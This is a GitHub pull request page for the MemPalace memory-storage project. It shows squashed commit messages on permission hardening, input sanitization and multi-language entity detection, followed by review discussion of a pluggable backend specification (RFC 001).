MemPalace/mempalace#809 * fix: move Slack provenance to footer, sanitize speaker IDs, extract constant - Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle) - Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports - Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal Refs: MemPalace/mempalace#809 * fix: restrict file permissions on sensitive palace data (#814) * fix: restrict file permissions on sensitive palace data On Linux with default umask (022), several files and directories containing personal data were created world-readable. This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility. Files hardened: - hooks_cli.py: hook_state/ directory and hook.log - entity_registry.py: entity_registry.json (names, relationships) - knowledge_graph.py: knowledge_graph.sqlite3 parent directory - exporter.py: export output directory and wing subdirectories - config.py: people_map.json (name mappings) - mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix) Refs: MemPalace/mempalace#809 * fix: avoid redundant chmod calls on hot paths - hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event) - exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches - mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically Refs: MemPalace/mempalace#809 * test: add palace_graph tunnel helper coverage Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered: - `_load_tunnels` - `_save_tunnels` - `create_tunnel` - `list_tunnels` - `delete_tunnel` - `follow_tunnels` * refactor(entity_detector): make multi-language extensible via i18n JSON Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged. Also adds: - get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales - MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated) - mempalace init --lang en,pt-br flag (persists to config.json) - Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default - _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship. * test: document orphan-locale recovery for _temp_locale helper * feat: add Russian language support to i18n module Add ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory. * feat(i18n): add entity detection section to Russian locale Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords. Follows the i18n entity framework from #911. * fix(i18n): apply review feedback on ru.json (#760) - mine_skip: "повторной раскопки" -> "повторной обработки" - quote_pattern: add Russian guillemet quotes «» Co-Authored-By: almirus <[email protected]> * feat(i18n): expand Russian entity stopwords with prepositions and conjunctions Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial. Co-Authored-By: almirus <[email protected]> * feat: add italian i18n support * feat: add italian entity patterns * Updated hi.json to support infra for entity,pronoun_patterns,dialogue_patterns,direct_address_pattern, project_verb_patterns and stopwords * feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911. * fix(i18n): address review feedback on pt-br.json - dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching) - entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives - pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas) * feat(cli): add version display and version flag to CLI Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit. * fix(i18n): resolve language codes case-insensitively (#927) BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning. The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong. Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it. Closes #927 * fix(i18n): use Optional[str] for Python 3.9 compatibility PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead. * fix(entity_detector): script-aware word boundaries for combining-mark scripts Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks. Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged. Changes: - mempalace/i18n/__init__…
jphein
left a comment
There was a problem hiding this comment.
Follow-up review after the 2026-04-13 round + @bensig's approval. Most of my earlier concerns are addressed; one new empirical observation worth flagging.
Closed from my prior review
-
§1.5 read-heavy edge case (palace stays
unknownindefinitely if it rarely writes) — closed by the explicitmempalace palace set-embedder --model NAMECLI in the three-state table at line 192. Operators of read-heavy palaces have a path that doesn't require waiting for a stale write to trigger identity resolution. ✓ -
§7.4 UUID5 namespace — bensig's block is still mechanical (placeholder
TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME); no opinion from this side on the value, just confirming it's the only remaining gate.
Still open from my prior review (no new info needed, just a note)
- §1.3 typed-results migration — RFC currently doesn't sketch a
.to_dict()compat shim onQueryResult/GetResult. Forks and downstream consumers with code touchingmcp_server.pyorsearcher.pythat assume dict returns will need real edits, not no-op wrappers. The cleanup PR mentioned in §10 is the right place to land it; just naming the question now so it isn't a surprise during that PR's review.
New: per-palace multi-collection isn't in the spec
The fork shipped a structural fix this week that's adjacent to RFC 001 in an interesting way. Cat 9 A/B benchmark on a 151K-drawer canonical palace surfaced that Stop-hook auto-save checkpoints (short, query-term-saturated) dominate vector top-N — kind=all returned 632 tokens/Q of mostly-checkpoint word-soup; kind=content (post-filter) returned 3 because over-fetch=100 wasn't enough. Recall was 0.984 R@5; E2E quality collapsed.
The fix promoted the architecture from "filter at query time" to "split at storage time": move checkpoints to a dedicated mempalace_session_recovery ChromaDB collection (same client, same palace, separate index), with a new mempalace_session_recovery_read MCP tool reading by session_id / agent / since-until. Implementation: palace.py gained _SESSION_RECOVERY_COLLECTION + get_session_recovery_collection(palace_path) mirroring get_collection(palace_path, collection_name="mempalace_drawers", create=...). Palace-daemon's lifespan runs migrate_checkpoints_to_recovery() on startup so existing palaces auto-migrate.
This works on the current BaseBackend / BaseCollection API — get_collection(palace, collection_name=...) is already keyed by collection_name, so adding a sibling collection per palace is just calling it with a different name. The design fell out of the existing seam.
Question for the spec: is "multiple collections per palace, by purpose" intentionally implicit in the API, or worth one sentence in §2.5 / §3.1? Reading the RFC, "palace" feels like the unit (1:1 with a collection); but production needed >1 collection per palace for the verbatim-vs-derivative split. Backends like Postgres (#665) and Qdrant (#700) handle this trivially via schema/collection naming, but a future backend that assumes 1:1 — or a backend author reading the spec — might design themselves into a corner. A "backends MUST support N collections per palace, keyed by collection_name arg" line would close the gap without changing any signatures.
(Spec at §1.6 calls out "many palaces" but not "many collections per palace." Adjacent but distinct.)
Rest of the spec
Read clean. §10's flagging of mcp_server._get_client() cache + reconnect for migration-into-ChromaBackend is exactly right — that #757 work is Chroma-specific and shouldn't live in mcp_server. §11's PR-impact table accurately reflects the in-flight backends; nothing missing from this side.
Net: ready to merge after UUID5 and (if desired) the multi-collection sentence.
|
Following up on Q1 from my 2026-04-15 comment — re-stating concretely now that approval is close, since this is the one item I'd like pinned in the spec rather than left to implementations. We treat §4.4 currently reads as naming-only ("the backend uses it as given"). Suggest one MUST clause:
Without this, hosted multi-tenant deployments can't cite RFC 001 as the basis for tenant isolation, and the contract becomes unenforceable across plugins from different authors. |
Summary
pip install mempalace-<name>packages that drop into core without patches.Tracking issue: #737 (see discussion and follow-up comments for the design rationale).
Key decisions in the draft
mempalace.backends;pip installis sufficient to add a backend.QueryResult/GetResultdataclasses replace Chroma's dict shape from day one.ChromaCollectiongets a thin adapter.PalaceRef(id, local_path?, namespace?)replacespalace_path: str. Backend instances are long-lived and multi-palace; thread-safe across palaces.$eq, $ne, $in, $nin, $and, $or, $contains; unknown operators MUST raiseUnsupportedFilterError(silent drop forbidden).model_nameand raiseEmbedderIdentityMismatchErroron swap (not just dimension).supports_*naming, free-form strings, extensible by third parties.AbstractBackendContractSuitepytest mixin + optional parametrized run of the core suite across all backends underMEMPALACE_TEST_ALL_BACKENDS=1.maintenance_state()/run_maintenance(kind); published numbers must cover three phases (post-load, post-native-maintenance, post-explicit-maintenance).mempalace migrate+mempalace verifyoperating throughBaseCollectiononly — no per-backend migration code.Impact on in-flight PRs
Each of #574, #643, #665, #697, #700, #381 is called out in §11 with the specific alignment work required — #574 is closest to the final shape, #697's
collection_prefixconcern dissolves intoPalaceRef.namespace, #700 and #381 need the canonical UUID5 namespace.Gating cleanup (not in this PR)
Seven files still import
chromadbdirectly (repair.py,dedup.py,cli.py×2,mcp_server.py,migrate.py, plus an instructions doc). Combined with the dict-to-typed-result migration, this needs its own PR landing before the spec can be enforced. Called out in §10.Test plan
changes_sincefilter, per-palace capability query,run_maintenancereturn shape)NAMESPACE_MEMPALACEUUID assigned (§7.4)AbstractBackendContractSuite+ entry-point discovery +PalaceRouter+PalaceRef